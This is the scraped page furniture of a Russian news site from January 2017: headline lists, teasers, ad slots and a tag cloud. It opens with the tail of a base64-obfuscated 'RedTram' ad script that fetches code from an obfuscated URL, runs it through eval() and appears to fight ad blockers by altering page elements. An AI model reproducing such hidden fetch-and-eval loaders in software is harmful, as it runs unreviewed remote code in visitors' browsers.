sYVsxOF0pO2I9IHRydWU7cmV0dXJufWVsc2Uge2lmKGRbYVszM11dW2FbMzRdXSgwLGRbYVszM11dW2FbMzJdXShhWzMxXSkpPT0gYVszNV0pe2UoZFthWzMzXV1bYVszNF1dKGRbYVszM11dW2FbMzJdXShhWzMxXSkrIDEsZFthWzMzXV1bYVs2XV0pKX19fTtmdW5jdGlvbiBpKCl7aWYoIWMpe2MoZmFsc2UsMCk7Yz0gZmFsc2U7cmV0dXJufTt2YXIgYj1kb2N1bWVudFthWzM3XV0oYVszNl0pO2Zvcih2YXIgZj0wO2Y8IGJbYVs2XV07ZisrKXtiW2ZdW2FbMzhdXT0gYVszOV19O3ZhciBlPVtkb2N1bWVudFthWzQwXV1dO2lmKGRvY3VtZW50W2FbNDJdXVthWzQxXV0pe2VbYVsxMF1dKGRvY3VtZW50W2FbNDJdXVthWzQxXV1bYVs0MF1dKX07aWYoIWEpe3JldHVybn07Zm9yKHZhciBmPTA7ZjwgZVthWzZdXTtmKyspe2Zvcih2YXIgZz0wO2c8IGVbZl1bYVs2XV07ZysrKXt2YXIgZD1lW2ZdW2ddO2RbYVs0M11dW2FbNDVdXVthWzQ0XV0oZFthWzQzXV0pfX19ZnVuY3Rpb24gZShiKXt2YXIgZT1oKCk7aWYoIWMpe2MoZmFsc2UsdHJ1ZSxudWxsKTtjPSBmYWxzZX07d2luZG93W2VdPSBkO2I9IGFbNDZdKyBiKyBhWzQ3XSsgZSsgYVs0OF07ZXZhbChiKX1pZihjPT0gMSl7Yj0gZmFsc2U7cmV0dXJufTtkW2FbMjNdXVthWzQ5XV09IGZ1bmN0aW9uKCl7ZFthWzIzXV1bYVs1MV1dKGcoYVs1MF0pKX07ZFthWzIzXV1bYVs1Ml1dPSBmdW5jdGlvbihkKXt2YXIgaD0gbmV3IGZbYVsyOV1dW2FbNTNdXSgpO2hbYVs1Nl1dKGFbNTRdLGcoYVs1NV0pLHRydWUpO2hbYVs1N11dPSBwZXJmb3JtYW5jZVthWzU4XV0oKTtoW2FbNTldXT0gZnVuY3Rpb24oKXtpZighYSl7YigpO3JldHVybn1lbHNlIHtpZihoW2FbNjBdXT09IDQpe2lmKGhbYVs2MV1dPT0gMjAwKXtlKGhbYVs2Ml1dKX1lbHNlIHtpZihjPT0gMSl7cmV0dXJufTtpZihoW2FbNjFdXT09IDApe2lmKGM9PSB0cnVlKXtjKCl9O2lmKChwZXJmb3JtYW5jZVthWzU4XV0oKS0gaFthWzU3XV0pPCA1MCl7aWYoIWEpe2IoMSwwKX1lbHNlIHtpKCl9fX19fX19O2lmKGI9PSAxKXtyZXR1cm59O2hbYVs1MV1dKG51bGwpfX0oYikoKX0pKCk=')));
   
    //
      var x=d.getElementsByTagName(s)[0];
      x.parentNode.insertBefore(o,x);
      })(document,"script");
      </script>
      <!-- RedTram End -->
</div>

      </div>
      
        
          
<div class="new-materials-for-rubric" style="display: none;">
  <div class="proscience-subject">Новое</div>
  <div class="square-flow">
    
  <div class="col3-special" id="square-news441898">
    
<a href="/news/2017/01/04/vitar_memory/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/01/04/thumbs/vitar_1483542487.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Виталий Арнольд на Летней школе в Дубне" title="Виталий Арнольд на Летней школе в Дубне" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      В автокатастрофе погиб организатор олимпиадного движения Виталий Арнольд
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441897">
    
<a href="/news/2017/01/04/no_euro/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/11/14/thumbs/_800-600_nGCGIhx_1483540073.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Марин Ле Пен" title="Марин Ле Пен" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Марин Ле Пен предложила избавиться от евро
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441896">
    
<a href="/news/2017/01/04/china_knife/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/10/12/thumbs/b1eb0f998b367904c5ba2c59f6ad5561_1483538841.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Рука с ножом" title="Рука с ножом" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      В Китае мужчина ранил ножом 11 детсадовцев
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441895">
    
<a href="/news/2017/01/04/fsin/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/01/04/thumbs/01_DqfMOiM_1483537073.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Участники пикета в поддержку Ильдара Дадина" title="Участники пикета в поддержку Ильдара Дадина" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Возле ФСИН задержали шестерых пикетчиков в поддержку Дадина
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441894">
    
<a href="/news/2017/01/04/tennis/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/10/24/thumbs/000_1483535554.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Светлана Кузнецова" title="Светлана Кузнецова" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Кузнецова повторила рекорд Шараповой по общему количеству побед
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441892">
    
<a href="/news/2017/01/04/konashenkov/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/10/28/thumbs/konashenkov_1483533594.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Официальный представитель Минобороны РФ Игорь Конашенков на авиабазе «Хмеймим» в Сирии" title="Официальный представитель Минобороны РФ Игорь Конашенков на авиабазе «Хмеймим» в Сирии" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Минобороны ответило на обвинения ЦРУ в «выжигании» Сирии
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article48716">
    
<a href="/article/2017/01/04/tabakh/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/12/19/thumbs/Tab1_1482166241.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Антон Табах" title="Антон Табах" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      Антон Табах
    
  
</div>

    <h4>
      Антон Табах об итогах 2016 года и прогнозах на 2017 год
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441891">
    
<a href="/news/2017/01/04/erdogan/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/10/06/thumbs/erdigan_1483530642.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Реджеп Эрдоган" title="Реджеп Эрдоган" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Эрдоган назвал цель атак террористов на Стамбул
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441890">
    
<a href="/news/2017/01/04/migrants/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2014/08/20/thumbs/03_1483529330.png.0x142_q85_crop_cropsize-190x142.jpg" alt="Беженцы с Украины" title="Беженцы с Украины" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      МВД подсчитало количество украинцев в России
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441889">
    
<a href="/news/2017/01/04/brennan/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/03/28/thumbs/brennan00-450_1483527812.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Директор ЦРУ - Джон Бреннан " title="Директор ЦРУ - Джон Бреннан " height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Глава ЦРУ назвал действия РФ в Сирии тактикой выжженной земли
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441888">
    
<a href="/news/2017/01/04/video/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/12/08/thumbs/007su33s_1483526003.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Посадка корабельного истребителя Су-33 на палубу авианосца &quot;Адмирал Кузнецов&quot;" title="Посадка корабельного истребителя Су-33 на палубу авианосца &quot;Адмирал Кузнецов&quot;" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Минобороны показало авиацию «Адмирала Кузнецова» в действии
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441887">
    
<a href="/news/2017/01/04/Cathay/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/01/04/thumbs/01_5bQLILX_1483525362.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Самолет авиакомпании Cathay Pacific" title="Самолет авиакомпании Cathay Pacific" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Самой безопасной авиакомпанией признали Cathay Pacific
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article48977">
    
<a href="/article/2017/01/04/market/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/11/18/thumbs/mmvb_600-450_1483525162.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Торги на бирже ММВБ" title="Торги на бирже ММВБ" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      Илья Карпюк
    
  
</div>

    <h4>
      Рынки начали новый год с мажорной ноты
    </h4>
  </div>
</a>

  </div>


  </div>
</div>

        
      
    </div>



<!--END #content-->

  
    
      
        
<div class="right-column ib-col">
  <div class="left-or-right-top-banner-slot"></div>
  <h4 class="subject">Главные новости</h4>

<div class="top-news">
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2014/09/06/thumbs/Pichler_1483516367.jpg.88x66_q85.jpg" alt="Вольфганг Пихлер" title="Вольфганг Пихлер" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/01/04/pihler/" class="hover">Россиян предложили не пускать на Олимпиаду 2018 года</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/04/06/thumbs/3829990260_1483524527.jpg.88x66_q85.jpg" alt="WikiLeaks" title="WikiLeaks" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/01/04/WikiLeaks/" class="hover">WikiLeaks назначил награду за данные о переписке Клинтон</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/12/08/thumbs/007su33s_1483526003.jpg.88x66_q85.jpg" alt="Посадка корабельного истребителя Су-33 на палубу авианосца &quot;Адмирал Кузнецов&quot;" title="Посадка корабельного истребителя Су-33 на палубу авианосца &quot;Адмирал Кузнецов&quot;" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/01/04/video/" class="hover">Минобороны показало авиацию «Адмирала Кузнецова» в действии</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2015/10/06/thumbs/erdigan_1483530642.jpg.88x66_q85.jpg" alt="Реджеп Эрдоган" title="Реджеп Эрдоган" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/01/04/erdogan/" class="hover">Эрдоган назвал цель атак террористов на Стамбул</a>
      </div>
    </div>
  
    <div class="top-news-story top-news-story-last">
      
        
          <img src="/media/photolib/2015/10/28/thumbs/konashenkov_1483533594.jpg.88x66_q85.jpg" alt="Официальный представитель Минобороны РФ Игорь Конашенков на авиабазе «Хмеймим» в Сирии" title="Официальный представитель Минобороны РФ Игорь Конашенков на авиабазе «Хмеймим» в Сирии" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/01/04/konashenkov/" class="hover">Минобороны ответило на обвинения ЦРУ в «выжигании» Сирии</a>
      </div>
    </div>
  
</div>



  

  

  

  
  <div class="front-right-slot"></div>

  

  
<div class="news-lenta">

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18:26</span>
            </span><a href="/news/2017/01/04/vitar_memory/" class="hover">В автокатастрофе погиб организатор олимпиадного движения Виталий Арнольд</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">17:27</span>
            </span><a href="/news/2017/01/04/no_euro/" class="hover">Марин Ле Пен предложила избавиться от евро</a>
        </div>
    
<div class="news-right-slot2"></div>
    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">17:07</span>
            </span><a href="/news/2017/01/04/china_knife/" class="hover">В Китае мужчина ранил ножом 11 детсадовцев</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">16:37</span>
            </span><a href="/news/2017/01/04/fsin/" class="hover">Возле ФСИН задержали шестерых пикетчиков в поддержку Дадина</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">16:12</span>
            </span><a href="/news/2017/01/04/tennis/" class="hover">Кузнецова повторила рекорд Шараповой по общему количеству побед</a>
        </div>
    

    

<div class="zabveniya-block" style="margin: 15px 0;font-family: Arial, Helvetica, sans-serif;">
<h4 style="background-color: #007854; text-align: center; font-weight: bold; color: #FFF;">ЗАБВЕНИЯ.NET</h4>
<a href="/news/2017/01/04/cereteli/">
  <div style="font-weight: bold;font-family: Arial, Helvetica, sans-serif;">Мемория. Зураб Церетели</div>
  
    <img src="/media/photolib/2016/06/15/thumbs/%D1%81%D1%82%D0%B0%D1%82%D1%83%D1%8F_1483291506.jpg.0x195_q85_crop_cropsize-260x195_upscale.jpg" alt="Зураб Церетели с головой монумента Христофору Колумбу" title="Зураб Церетели с головой монумента Христофору Колумбу" width="240"/>
  
  <div style="font-family: Arial, Helvetica, sans-serif;">4 января 1934 года родился Зураб Церетели, художник и скульптор, президент Российской академии художеств.</div>
</a>
</div>


    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">16:07</span>
            </span><a href="/news/2017/01/04/math_konkurs/" class="hover">«Рождественские математические встречи» проходят в Москве</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">15:39</span>
            </span><a href="/news/2017/01/04/konashenkov/" class="hover">Минобороны ответило на обвинения ЦРУ в «выжигании» Сирии</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">14:50</span>
            </span><a href="/news/2017/01/04/erdogan/" class="hover">Эрдоган назвал цель атак террористов на Стамбул</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">14:28</span>
            </span><a href="/news/2017/01/04/migrants/" class="hover">МВД подсчитало количество украинцев в России</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">14:03</span>
            </span><a href="/news/2017/01/04/brennan/" class="hover">Глава ЦРУ назвал действия РФ в Сирии тактикой выжженной земли</a>
        </div>
    
    </div>
    

    
    <div class="news-right-slot10"></div>
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:53</span>
            </span><a href="/news/2017/01/04/video/" class="hover">Минобороны показало авиацию «Адмирала Кузнецова» в действии</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:22</span>
            </span><a href="/news/2017/01/04/Cathay/" class="hover">Самой безопасной авиакомпанией признали Cathay Pacific</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:08</span>
            </span><a href="/news/2017/01/04/WikiLeaks/" class="hover">WikiLeaks назначил награду за данные о переписке Клинтон</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:59</span>
            </span><a href="/news/2017/01/04/china/" class="hover">КНР обещала ускорить таможенные процедуры на треть</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:24</span>
            </span><a href="/news/2017/01/04/twitter_trump/" class="hover">Трамп решил начать вести президентский Twitter с чистого листа</a>
        </div>
    

    
    
    <div class="news-right-slot"></div>
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:13</span>
            </span><a href="/news/2017/01/04/turkey_astana/" class="hover">МИД Турции назвал дату переговоров по Сирии в Астане</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:47</span>
            </span><a href="/news/2017/01/04/kaliningrad/" class="hover">Калининградский аэропорт решили оставить закрытым до 13:00</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:30</span>
            </span><a href="/news/2017/01/04/terrorist/" class="hover">Личность напавшего на стамбульский ночной клуб террориста установлена</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:52</span>
            </span><a href="/news/2017/01/04/pihler/" class="hover">Россиян предложили не пускать на Олимпиаду 2018 года</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:37</span>
            </span><a href="/news/2017/01/04/turkey_talks/" class="hover">МИД Турции назвал дату приезда экспертов из РФ по сирийскому вопросу</a>
        </div>
    

    
    
    
    <div class="news-right-slot20"></div>
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:17</span>
            </span><a href="/news/2017/01/04/titanic/" class="hover">Журналист установил скрытую причину гибели «Титаника»</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:50</span>
            </span><a href="/news/2017/01/04/claiton/" class="hover">СМИ узнали имя главы Комиссии по ценным бумагам США</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:23</span>
            </span><a href="/news/2017/01/04/hrabrovo/" class="hover">Калининградский аэропорт закрыли после аварийной посадки А320</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 21:06</span>
            </span><a href="/news/2017/01/03/terrorists/" class="hover">Источник сообщил о проникновении в Европу 400 террористов из Сирии</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 20:50</span>
            </span><a href="/news/2017/01/03/trump_congress/" class="hover">Трамп посоветовал конгрессу сосредоточиться на медицине и налогах</a>
        </div>
    

    
    
    
    
    <div class="news-right-slot25"></div>
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 20:32</span>
            </span><a href="/news/2017/01/03/ban/" class="hover">В СБУ допустили запрет Ле Пен въезжать на Украину</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 20:15</span>
            </span><a href="/news/2017/01/03/main_kampf/" class="hover">Научное переиздание Mein Kampf стало бестселлером в Германии</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 19:54</span>
            </span><a href="/news/2017/01/03/dodon/" class="hover">Президент Молдавии лишил гражданства экс-президента Румынии</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 19:42</span>
            </span><a href="/news/2017/01/03/karpin/" class="hover">Валерий Карпин может возглавить «Анжи»</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 19:17</span>
            </span><a href="/news/2017/01/03/m16/" class="hover">На Украине будут выпускать винтовки M16</a>
        </div>
    

    
    
    
    
    
    
<script type="text/javascript"><!--
google_ad_client = "ca-pub-1191230850516122";
/* adxguru\polit.ru\240x400\0 */
google_ad_slot = "2380101327";
google_ad_width = 240;
google_ad_height = 400;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>

    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 18:57</span>
            </span><a href="/news/2017/01/03/ustyugov/" class="hover">Сергей Устюгов в третий раз выиграл золото на «Тур де Ски»</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 18:48</span>
            </span><a href="/news/2017/01/03/skeleton/" class="hover">Стали известны имена отстраненных российских скелетонистов</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 18:30</span>
            </span><a href="/news/2017/01/03/mobile_kitchen/" class="hover">В Москве развернули полевые кухни МЧС</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 16:59</span>
            </span><a href="/news/2017/01/03/mashrapov_interview/" class="hover">Предполагаемый стамбульский террорист опроверг причастность к нападению</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 16:42</span>
            </span><a href="/news/2017/01/03/whatsapp/" class="hover">WhatsApp перестанет работать на смартфонах с Android 2.2 и iPhone 3GS</a>
        </div>
    

    
    
    
    
    
    
    <div class="news-right-slot35"></div>

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 16:24</span>
            </span><a href="/news/2017/01/03/children/" class="hover">Путин поручил проверить правомерность изъятия детей из семьи</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 16:03</span>
            </span><a href="/news/2017/01/03/firework/" class="hover">Житель Хабаровского края погиб при проверке фейерверка</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 15:50</span>
            </span><a href="/news/2017/01/03/terrorist/" class="hover">Стало известно имя и гражданство стамбульского террориста</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 15:24</span>
            </span><a href="/news/2017/01/03/le_pen/" class="hover">Ле Пен признала законность присоединения Крыма к России</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 15:02</span>
            </span><a href="/news/2017/01/03/cash_payment/" class="hover">На Украине запретили наличные расчеты при сумме более 112 тысяч рублей</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 14:37</span>
            </span><a href="/news/2017/01/03/independence/" class="hover">Путин поручил проверить независимость судей</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 14:15</span>
            </span><a href="/news/2017/01/03/refugees/" class="hover">Германия стала самым популярным государством для беженцев в Европе</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 13:54</span>
            </span><a href="/news/2017/01/03/netanyahu/" class="hover">Израильского премьера допросили из-за подозрений в коррупции</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 13:45</span>
            </span><a href="/news/2017/01/03/climber/" class="hover">Спасатели вытащили туриста из Электростали из трещины на Эльбрусе</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 13:33</span>
            </span><a href="/news/2017/01/03/puchkov/" class="hover">Глава МЧС предложил установить в Москве полевые кухни из-за сильных морозов</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 13:17</span>
            </span><a href="/news/2017/01/03/brent58/" class="hover">Стоимость нефти превысила 58 долларов впервые за полтора года</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 13:05</span>
            </span><a href="/news/2017/01/03/admiral/" class="hover">Источник сообщил о возвращении «Адмирала Кузнецова» на родину в январе</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 12:50</span>
            </span><a href="/news/2017/01/03/tuleev/" class="hover">Тулеев попросил Медведева ограничить рост цен на бензин</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 12:32</span>
            </span><a href="/news/2017/01/03/dresses/" class="hover">Мария Захарова рассказала о выборе платьев</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">03.01 12:14</span>
            </span><a href="/news/2017/01/03/oilfield/" class="hover">В Белоруссии открыли новое месторождение нефти</a>
        </div>
    

    
    
    
    
    
    
    

</div>


  
  
    


  

<div class="tags-cloud">

  

  

  

  

  

  
  <a href="/tag/apple/" class="weight7">Apple</a>
  

  

  

  

  

  

  

  
  <a href="/tag/boeing/" class="weight8">Boeing</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/facebook/" class="weight6">Facebook</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/google/" class="weight6">Google</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/nato/" class="weight9">NATO</a>
  

  

  

  

  

  
  <a href="/tag/pro-science-video/" class="weight0 macrotag">PRO SCIENCE видео</a>
  

  
  <a href="/tag/proscience-theatre/" class="weight7 force-hi macrotag">ProScience Театр</a>
  

  
  <a href="/tag/pussy-riot/" class="weight8">Pussy Riot</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/twitter/" class="weight7">Twitter</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/railwayincidents/" class="weight7">аварии на железной дороге</a>
  

  

  
  <a href="/tag/aviakatastrofa/" class="weight10 force-hi">авиакатастрофа</a>
  

  

  
  <a href="/tag/australia/" class="weight7">Австралия</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/avtoprom/" class="weight9">автопром</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/azerbaijan/" class="weight6">Азербайджан</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/aleksandr-lukashenko/" class="weight6">Александр Лукашенко</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/alexey_navalny/" class="weight9">Алексей Навальный</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/alcohol/" class="weight6">алкоголь</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/amnisty/" class="weight6">амнистия</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/anatolij-serdyukov/" class="weight6">Анатолий Сердюков</a>
  

  

  

  

  

  
  <a href="/tag/angela-merkel/" class="weight7">Ангела Меркель</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/antimajdan/" class="weight10 force-hi">Антимайдан</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/armeniya/" class="weight6">Армения</a>
  

  
  <a href="/tag/army/" class="weight10 force-hi">армия</a>
  

  

  

  

  
  <a href="/tag/arsenij-yacenyuk/" class="weight7">Арсений Яценюк</a>
  

  

  

  

  

  

  

  
  <a href="/tag/archeology/" class="weight8">археология</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/astronomy_topic/" class="weight8">астрономия</a>
  

  

  

  

  

  

  
  <a href="/tag/nuclear_energy/" class="weight10 force-hi">атомная энергия</a>
  

  

  

  

  

  

  
  <a href="/tag/afganistan/" class="weight7">Афганистан</a>
  

  

  

  

  
  <a href="/tag/aeroflot/" class="weight6">Аэрофлот</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/bankovskij-sektor/" class="weight10">банковский сектор</a>
  

  

  
  <a href="/tag/barak-obama/" class="weight9">Барак Обама</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/bashar-asad/" class="weight1">Башар Асад</a>
  

  

  
  <a href="/tag/bezhency/" class="weight7">беженцы</a>
  

  
